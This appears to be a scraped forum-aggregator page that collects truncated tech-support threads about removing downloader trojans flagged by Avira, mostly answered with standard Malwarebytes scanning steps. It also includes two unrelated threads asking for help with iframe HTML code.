Hi and welcome to TSG,

The General Security forum is only for general questions regarding security software and things of that nature but not for actually removing malware as we have qualified helpers who are the only members who are authorized to assist with those matters. You can easily identify them as they have either a gold or blue shield beside their usernames. Please refer to this excerpt from the rules:

Log Analysis/Malware Removal - In order to ensure that advice given to users is consistent and of the highest quality, those who wish to assist with security related matters must first graduate from one of the malware boot camp training universities or be approved by the administration as already being qualified. Those authorized to help with malware issues have a gold shield next to their name and authorized malware removal trainees have a blue shield next to their names. Anyone wishing to participate in a training program should contact a Moderator for more information.Click to expand...

I'm going to close this thread and ask you to repost in the Malware Removal & HijackThis Logs forum for the proper assistance.
 

Read other 1 answers
RELEVANCY SCORE 39.2

Hello my antivirus(Avira) keeps giving me a warning that I have a trojan called TR/Dldr.Agent.apzz, and no matter what I do it comes back in about a quarter of a second.

How can I remove it for good?
It keeps making a new file and moving to that file whenever I try to delete it or move it to a quarantine, and when I tried to delete the file directly the computer gave me an access denied message.
 

A:TR/Dldr.Agent.apzz

Read other 12 answers
RELEVANCY SCORE 39.2

Thank you Bleeping Computer for any assist:I wonder if I should un-install the Avira AntiVir Personal-Free and start again following your I Am Infected instructions? I keep getting a variety of web Pop-Ups and unusually slow and bizarre computer performance - and when in Task Manager I try to end the particular web pop-up it shuts down the Internet Explorer browser page as if they are linked. I installed the Avira AntiVir Personal-Free last week -- brief summary: 2346 Scanning directories 92356 Files were scanned 23 viruses and/or unwanted programs were found 0 Files were classified as suspicious: 2 files were deleted 0 files were repaired 13 files were moved to quarantine 0 files were renamed 2 Files cannot be scanned 92331 Files not concerned 484 Archives were scanned 7 Warnings 15 NotesThe Avira offers a choice to "delete" or "move to quarantine".I do not know if they are deleting an infection -or- an important system 32 file e.g C:\WINDOWS\System32\__c00C7BAA.dat.C:\WINDOWS\SYSTEM32\IASRAD32.DLLI did choose at that first scan to 'delete' twice - until I started wondering what it meant - but those infected files did not seem to delete after all becasue I keep getting alerts about them still.I am getting bombarded by Avira Guard Alerts and need to keep quarantining the same 2 typesVirus or unwanted program 'TR/Dldr.VMC.1 [trojan]'detected in file 'C:\W... Read more

A:Avira Detected Tr/spy.gen V Tr/dldr.vmc.1 Plus More

Hi Karen,I wonder if I should un-install the Avira AntiVir Personal-Free and start again following your I Am Infected instructions? I wouldn't just yet. Just make sure it is updated!Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself.Press the OK button to close that box and continue.If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results&... Read more

Read other 32 answers
RELEVANCY SCORE 39.2

Hi,I have a website that recently had some malicious code injected into the home page. The hosting company looked into this for me and sent me this reply:It appears that malicious code has been uploaded to your account via FTP using a compromised username and password. At this time, I have removed the malicious code from the account. From our experience with malware of this nature, the user account passwords are compromised though viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware. MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ) have been reported to be able to clean this malware.I have downloaded malwarebytes and run the scan, it found several issues and clened them:This is the log for that:Malwarebytes' Anti-Malware 1.37Database version: 2295Windows 5.1.2600 Service Pack 317/06/2009 14:53:17mbam-log-2009-06-17 (14-53-17).txtScan type: Full Scan (C:\|)Objects scanned: 249698Time elapsed: 50 minute(s), 20 second(s)Memory Processes Infected: 0Memory Modules Infected: 0Registry Keys Infected: 20Registry Values Infected: 2Registry Data Items Infected: 0Folders Infected: 0... Read more

A:I have 'TR/Dldr.Agent.HBR.2 [trojan]'

Hi,Strange they advice ComboFix, because that's a tool that should be used under supervision of a HJT Team Member. I suggest you tell this to your hosting company.Now, please do a full scan with MBAM, and post the results.

Read other 13 answers
RELEVANCY SCORE 39.2

I'm infected with the TR/Dldr.fraudlo.sxm virus. Is there someone that can help me out?

Read other answers
RELEVANCY SCORE 39.2

I found your site on google, and there was a similar problem but the topic is closed...
For several months i'm trying to get rid of TR/Dldr.Swizzor.Gen2. I've tried different antivirus programs (Avira, Kasperski, Nod...) and now the last option is to take the computer on re-installation and cleaning... You are my last chance!!!
Deleted, in quarantine, ignored... however, he always returns... 5-6 times a day. I am now at the stage of scanning computer 3 times a day, because i don't know what to do... so at least I have the feeling of doing something even though I know this doesn't solve anything...
My computer is now slow (although it is new), half of the program is not working, and the other half was apparently not installed correctly... To remind, the laptop is new (5-6 months old) and the first month everything is working properly. When the first problem appeared with him came and TR/Dldr.Swizzor.Gen2. Now the situation is worse every day, the computer is slower, every day TR/Dldr.Swizzor.Gen2 appears at least one time more than yesterday, programs are increasingly difficult to use, and I'm seriously losing my nerves!!!
Do you have any idea?
Please help me!!!

A:TR/Dldr.Swizzor.Gen2

The process of cleaning your computer may require you to temporarily disable some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.Please download Malwarebytes Anti-Malware Free version and save it to your desktop.NOTE: Before saving MBAM please rename it to zztoy.exe....now save it to your desktop.alternate download link 1alternate download link 2Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself.Press the OK button to close that box and continue.If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.When the scan is finished, a message ... Read more

Read other 12 answers
RELEVANCY SCORE 39.2

I believe this started with a Lime Wire update, at least it started shortly after. AntiVir detected "TR/Dldr.Small.dxm.4" so I put it in Quarantine for now. File name is C:/a.exe. LimeWire now starts by itself even after I close it and Exit from the Task Bar. I uninstalled LimeWire but it still opens but not showing up in Add/Remove programs. Also Spybot finds nothing in scan but warning box constantly pops up warning of a Key Reg change that is being blocked.

Step 1) I found none of listed malware
Step 2) Panda will not scan w/Vista
Step 3) Already had both Spyware Blaster and IE-Spyad
Step 4) Auto Update on - no new updates
Step 5) Ran Deckard and HyjackThis

PC Wizard 2007 Version 1.73
------------------------------------------------------------------------------------------

Owner: adam
User: ADAM SR
Operating System: Windows Vista (TM) Ultimate Professional 6.00.6000
Report Date: Thursday 25 October 2007 at 21:40

------------------------------------------------------------------------------------------


<<< System Summary >>>

> Mainboard : Acer Navarro

> Chipset : ATI Radeon RS482

> Processor : AMD Turion 64 Mobile ML-38 @ 2200 MHz

> Physical Memory : 2048 MB (2 x 1024 DDR2-SDRAM )

> Video Card : ATI Technologies Inc Radeon XPRESS 200M SERIES

> Hard Disk : TOSHIBA (120 GB)

> DVD-Rom Drive : MATSHITA DVD-RAM UJ-850S ATA Device

> Monitor Type : 20 inches
... Read more

A:[SOLVED] TR/Dldr.Small.dxm.4

bump.

Read other 2 answers
RELEVANCY SCORE 38.8

I am working on a site using an IFrame. It is a copy of another site I have using the same IFrame. In the original site the homepage shows up on load but on the reworked site it loads the home page and then it disappears. I am using IE to view these pages.

A friend said he looked at the site in FireFox and it works correctly, so it leads me to believe it may be an IE thing but the original site works fine in IE.

I am out of ideas here. HELP!
 

A:IFrame help

post the sites url and I will check out the code....... if I can see it.

d.
 

Read other 2 answers
RELEVANCY SCORE 38.8

Still I frame. I have an Iframe on my site and I wanted to show only a certain part of the site inside it and unscrolable too. Can I tell the browser(s) to do this? and how. Please help.
 

A:Still Iframe - Please Help

Read other 12 answers
RELEVANCY SCORE 38.8
Q: iframe

How do clear the iframe in netscape 7.0 and Internet explorer. The following code works in IE but not in netscape

<html>
<head>
<title>Simple Math Practice</title>


<script language="javascript" type="text/javascript">
<!-- Hide Script
function RandPosInt() {
Rnum = Math.round(Math.random()*8+1);
return Rnum;
}

function WriteHeader() {
problem.document.write('<html><head><link href="math.css" rel="stylesheet" type="text/css"><\/head><body>');
}

function WriteContent() {
problem.document.write("this is content");
}

function WriteFooter() {
problem.document.write("<\/body><\/html>");
}

function ClearFrame() {
problem.document.open();
problem.document.clear();
}

function CloseFrame() {
problem.document.close();
}


// End Hiding Script -->
</script>


<link href="math.css" rel="stylesheet" type="text/css">
</head>
<body>
<div align="center">
<h1>Simple Math Practice</h1>

<iframe
src="defaultframe.html" id="problem" name="problem" frameborder="1" marginwidth="10" marginheight="10" scrolling="no" align="top" height="200" width=&quo... Read more

A:iframe

That function is no longer supported. See here:
http://www.web-developer-india.com/web/jscript/refp_77.html
 

Read other 1 answers
RELEVANCY SCORE 38.4

G'Day everyone. Below is my log of HJ. I will also post my Malwarebytes Anti-malware log just in case. This problem started maybe 5 days ago while looking a bedroom sets. At that time AVG 8.0 was running it caught a few things some of which were healed others were not. I installed the Malware w/o difficulty updated, scanned and deleted only 2-3 objects (all Trojans) also installed the typical line up: Spybot, HJthis, CCleaner, Ad-aware. DL'd but did not install Windows bit defender and unistalled AVG 8.0 to install Avira. I did this because I was not confident in AVG's ability to find/remove as much as Avira. Lastly, I did the free online scans from: Mcafee & Norton. At this point I can't be sure this computer is "junk" free. I have gone 2 days without detections even with the constant scanning this was done in both safe and normal mode. Today I received the above detection approximately 5 times. Each time I elected to delete. I assume this was done as Avira has not popped up with another detection. Have a look, give me your opinion. As a last note, I have researched the above Trojan with better results than the earlier detections. I have DL'd Smitfraudfix I will not run this program until hearing back on this site. Thanks for everyone's help.Logfile of Trend Micro HijackThis v2.0.2Scan saved at 11:04:00, on 4/23/2009Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v8.00 (8.00.6001.18702)Boot mode: NormalRunning processes:C:\WINDOWS\Sy... Read more

A:Latest Detection: JS/Dldr.Agent.Agr.1

Hello and welcome to Bleeping Computer.My name is km2357 and I will be helping you to remove any infection(s) that you may have.I will be giving you a series of instructions that need to be followed in the order in which I give them to you.If for any reason you do not understand an instruction or are just unsure then please do not guess, simply post back with your questions/concerns and we will go through it again.Please do not start another thread or topic, I will assist you at this thread until we solve your problems.Lastly the fix may take several attempts and my replies may take some time but I will stick with it if you do the same.I will be back as soon as possible with your first instructions!Sorry for the delay in replying, the forum is very busy. If you still need help, please post a fresh HiJackThis Log

Read other 3 answers